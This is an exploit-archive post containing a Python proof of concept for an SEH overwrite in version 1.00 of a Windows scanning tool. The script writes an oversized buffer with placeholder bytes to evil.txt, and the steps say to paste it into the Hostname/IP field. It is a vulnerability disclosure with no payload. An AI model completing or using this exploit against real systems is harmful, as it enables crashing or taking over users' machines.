Home / os / winmobile

CIScan 1.00 SEH Overwrite

Posted on 14 May 2016

#!/usr/bin/python # Exploit Title : CIScanv1.00 Hostname/IP Field SEH Overwrite POC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 11/05/2016 # Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx # Tested Version : 1.00 # Vulnerability Type: SEH Overwrite POC # Tested on OS : Windows 7 Home Basic # Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press -> ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## #SEH chain of main thread #Address SE handler #0012FA98 43434343 #42424242 *** CORRUPT ENTRY *** # Offset to the SEH Frame is 536 buffer = "A"*536 # Address of the Next SEH Frame nseh = "B"*4 # Address to the Handler Code, Generally P/P/R Address seh = "C" *4 f = open("evil.txt", "wb") f.write(buffer+nseh+seh) f.close()

 

TOP